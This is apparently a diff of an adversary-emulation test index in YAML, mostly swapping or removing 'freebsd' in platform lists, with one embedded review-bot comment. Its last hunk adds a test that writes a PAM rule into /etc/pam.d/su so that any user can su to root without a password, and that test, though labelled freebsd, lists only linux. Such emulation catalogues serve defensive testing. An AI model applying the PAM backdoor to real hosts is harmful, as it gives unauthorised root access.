||||
The trap executes script that writes to /tmp/art-fish.txt
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if bash is installed.
|
||||
@@ -63061,7 +63016,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
username:
|
||||
description: Username of the user to create
|
||||
@@ -63184,7 +63139,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
username:
|
||||
description: Username of the user to create
|
||||
@@ -64042,9 +63997,8 @@ persistence:
|
||||
persistence on victim host. \nIf the user is able to save the same contents
|
||||
in the authorized_keys file, it shows user can modify the file.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -70371,7 +70325,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
command_to_add:
|
||||
description: Command to add to the .shrc file
|
||||
@@ -70392,7 +70346,6 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
text_to_append:
|
||||
@@ -70415,7 +70368,6 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
text_to_append:
|
||||
@@ -72694,7 +72646,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -73032,7 +72984,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
rc_service_path:
|
||||
description: Path to rc service file
|
||||
@@ -74533,7 +74485,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
time_spec:
|
||||
description: Time specification of when the command should run
|
||||
@@ -75168,7 +75120,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -75209,7 +75161,7 @@ persistence:
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -75251,7 +75203,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -75631,7 +75583,7 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
destination_url:
|
||||
description: Destination URL to post encoded data.
|
||||
@@ -77896,7 +77848,7 @@ command-and-control:
|
||||
with add-ons in order to provide onion routing functionality.\nUpon successful
|
||||
execution, the tor proxy service will be launched. \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: "Tor must be installed on the machine \n"
|
||||
@@ -78050,7 +78002,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -78810,7 +78761,6 @@ command-and-control:
|
||||
This test simulates an infected host beaconing to command and control.
|
||||
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -78899,7 +78849,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -78939,7 +78888,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -78978,7 +78926,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -79009,7 +78956,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -79040,7 +78986,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -79071,7 +79016,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -79280,7 +79224,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -79937,9 +79880,8 @@ command-and-control:
|
||||
|
||||
Note that this test may conflict with pre-existing system configuration.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
proxy_server:
|
||||
description: Proxy server URL (host:port)
|
||||
@@ -80502,7 +80444,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -80532,7 +80473,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -80569,9 +80509,8 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
test_folder:
|
||||
description: Path used to store files.
|
||||
@@ -80789,7 +80728,7 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file path
|
||||
@@ -80851,7 +80790,7 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file path
|
||||
@@ -81207,7 +81146,7 @@ collection:
|
||||
syslog.\n\nTo gain persistence the command could be added to the users .shrc
|
||||
or .profile \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'This test requires to be run in a bash shell and that logger
|
||||
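Review bot: the dependency says the test "requires to be run in a bash shell", but FreeBSD does not ship bash in the base system and the description proposes persistence through `.shrc` or `.profile`, which are sh files; make sure the prerequisite installs bash on FreeBSD or rewrite the test for sh. The credential-access copy of this test later in the diff carries the same dependency text.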
@@ -81241,7 +81180,6 @@ collection:
|
||||
persistence the command could be added to the users .bashrc or .bash_aliases
|
||||
or the systems default .bashrc in /etc/skel/ \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
@@ -81828,7 +81766,7 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Location to save downloaded discovery.bat file
|
||||
@@ -82719,7 +82657,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_input_file:
|
||||
@@ -82756,7 +82693,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_input_file:
|
||||
@@ -82793,7 +82729,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_input_file:
|
||||
@@ -82830,7 +82765,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_input_file:
|
||||
@@ -87659,7 +87593,7 @@ credential-access:
|
||||
|
||||
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_pam_conf:
|
||||
description: PAM config file to modify.
|
||||
@@ -87935,7 +87869,7 @@ credential-access:
|
||||
syslog.\n\nTo gain persistence the command could be added to the users .shrc
|
||||
or .profile \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'This test requires to be run in a bash shell and that logger
|
||||
@@ -87969,7 +87903,6 @@ credential-access:
|
||||
persistence the command could be added to the users .bashrc or .bash_aliases
|
||||
or the systems default .bashrc in /etc/skel/ \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
@@ -88448,7 +88381,7 @@ credential-access:
|
||||
the sudo_bruteforce.sh which brute force guesses the password, then deletes
|
||||
the user\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
remote_url:
|
||||
description: url of remote payload
|
||||
@@ -90117,7 +90050,7 @@ credential-access:
|
||||
copy process memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
@@ -90162,7 +90095,6 @@ credential-access:
|
||||
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -90468,7 +90400,7 @@ credential-access:
|
||||
|
||||
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
interface:
|
||||
description: Specify interface to perform PCAP on.
|
||||
@@ -90706,7 +90638,7 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
@@ -90747,7 +90679,7 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
@@ -92871,9 +92803,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from.
|
||||
@@ -92924,7 +92855,7 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from.
|
||||
@@ -92986,7 +92917,7 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from.
|
||||
@@ -93048,7 +92979,7 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from
|
||||
@@ -95022,7 +94953,7 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
@@ -95128,7 +95059,6 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
@@ -95158,9 +95088,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
@@ -95204,9 +95133,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
@@ -96457,7 +96385,7 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
target_host:
|
||||
description: IP Address / Hostname you want to target.
|
||||
@@ -97138,7 +97066,7 @@ credential-access:
|
||||
auto_generated_guid: 5076874f-a8e6-4077-8ace-9e5ab54114a5
|
||||
description: "/etc/master.passwd file is accessed in FreeBSD environments\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
@@ -97157,7 +97085,6 @@ credential-access:
|
||||
auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d
|
||||
description: "/etc/passwd file is accessed in FreeBSD and Linux environments\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -97179,7 +97106,6 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -97203,7 +97129,6 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -99059,7 +98984,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will stdout list of usernames.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -100288,7 +100212,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -100307,7 +100230,6 @@ discovery:
|
||||
auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
|
||||
description: "(requires root)\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -100331,7 +100253,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -100354,7 +100275,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -100411,7 +100331,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
@@ -100431,7 +100351,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -100614,7 +100533,7 @@ discovery:
|
||||
Detects execution in a virtualized environment.
|
||||
At boot, dmesg stores a log if a hypervisor is detected.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -101153,7 +101072,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'service -e
|
||||
|
||||
@@ -101283,7 +101202,7 @@ discovery:
|
||||
|
||||
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
interface:
|
||||
description: Specify interface to perform PCAP on.
|
||||
@@ -101521,7 +101440,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
@@ -101562,7 +101481,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
@@ -101861,7 +101780,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
package_checker:
|
||||
description: Package checking command. pkg info -x samba
|
||||
@@ -102197,7 +102116,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -102258,7 +102176,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
kldstat | grep -i "vmm"
|
||||
@@ -102283,7 +102201,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -102357,9 +102274,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'env
|
||||
|
||||
@@ -102588,7 +102504,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
kldstat
|
||||
@@ -103128,7 +103044,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -103193,7 +103108,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed.
|
||||
@@ -103405,7 +103320,7 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
|
||||
@@ -104003,9 +103918,8 @@ discovery:
|
||||
|
||||
https://perishablepress.com/list-files-folders-recursively-terminal/
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file used to store the results.
|
||||
@@ -104031,9 +103945,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file used to store the results.
|
||||
@@ -104225,7 +104138,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
dependency_executor_name: sh
|
||||
@@ -104575,7 +104487,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -104793,9 +104704,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: |
|
||||
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
|
||||
@@ -105024,7 +104934,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'cat /etc/pam.d/passwd
|
||||
|
||||
@@ -105305,7 +105215,6 @@ discovery:
|
||||
Upon successful execution, the output will contain the environment variables that indicate
|
||||
the 5 character locale that can be looked up to correlate the language and territory.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'locale
|
||||
@@ -105363,7 +105272,6 @@ discovery:
|
||||
also used as a builtin command that does not generate syscall telemetry but
|
||||
does provide a list of the environment variables.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
@@ -105739,7 +105647,7 @@ discovery:
|
||||
Methods to identify Security Software on an endpoint
|
||||
when sucessfully executed, command shell is going to display AV/Security software it is running.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'pgrep -l ''bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd''
|
||||
|
||||
@@ -106104,7 +106012,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
dependency_executor_name: sh
|
||||
@@ -106130,7 +106037,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -106324,7 +106230,7 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'netstat -r | grep default
|
||||
|
||||
@@ -106603,7 +106509,7 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
host:
|
||||
description: Host to scan.
|
||||
@@ -107186,7 +107092,7 @@ discovery:
|
||||
description: "Identify system time. Upon execution, the local computer system
|
||||
time and timezone will be displayed. \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'date
|
||||
@@ -113671,7 +113577,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
pwd_for_encrypted_file:
|
||||
@@ -113717,7 +113622,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
pwd_for_encrypted_file:
|
||||
@@ -113756,7 +113660,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
cped_file_path:
|
||||
@@ -113807,7 +113710,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
private_key_path:
|
||||
@@ -114349,9 +114251,8 @@ impact:
|
||||
This test simulates a high CPU load as you might observe during cryptojacking attacks.
|
||||
End the test by using CTRL/CMD+C to break.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'yes > /dev/null
|
||||
|
||||
@@ -114549,7 +114450,6 @@ impact:
|
||||
Overwrites and deletes a file using DD.
|
||||
To stop the test, break the command with CTRL/CMD+C.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -115231,9 +115131,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
timeout:
|
||||
description: Time to restart (can be minutes or specific time)
|
||||
@@ -115251,9 +115150,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
timeout:
|
||||
description: Time to shutdown (can be minutes or specific time)
|
||||
@@ -115271,9 +115169,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'reboot
|
||||
|
||||
@@ -115286,7 +115183,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'halt -p
|
||||
@@ -115300,7 +115196,7 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'halt -r
|
||||
|
||||
@@ -115326,7 +115222,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'poweroff
|
||||
@@ -115340,7 +115235,7 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'poweroff -r 3
|
||||
|
||||
@@ -117508,7 +117403,7 @@ initial-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -117549,7 +117444,7 @@ initial-access:
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -117591,7 +117486,7 @@ initial-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -118137,7 +118032,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
input_file:
|
||||
description: Test file to upload
|
||||
@@ -118316,7 +118210,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
domain:
|
||||
description: target SSH domain
|
||||
@@ -118338,7 +118231,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
user_name:
|
||||
description: username for domain
|
||||
@@ -118738,7 +118630,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
file_name:
|
||||
description: File name
|
||||
@@ -119022,7 +118913,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
executor:
|
||||
steps: |
|
||||
1. Victim System Configuration:
|
||||
@@ -119069,7 +118959,6 @@ exfiltration:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
steps: "1. On the adversary machine run the below command.\n\n tshark -f
|
||||
@@ -119253,7 +119142,7 @@ exfiltration:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
|
||||
+2808
-136
@@ -669,6 +669,36 @@ defense-evasion:
|
||||
'
|
||||
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
- name: Malicious PAM rule (freebsd)
|
||||
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3
|
||||
description: |
|
||||
Inserts a rule into a PAM config and then tests it.
|
||||
|
||||
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_pam_conf:
|
||||
description: PAM config file to modify.
|
||||
type: string
|
||||
default: "/etc/pam.d/su"
|
||||
pam_rule:
|
||||
description: Rule to add to the PAM config.
|
||||
type: string
|
||||
default: auth sufficient pam_succeed_if.so uid >= 0
|
||||
index:
|
||||
description: Index where the rule is inserted.
|
||||
type: integer
|
||||
default: 8
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
- name: Malicious PAM module
|
||||
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
|
||||
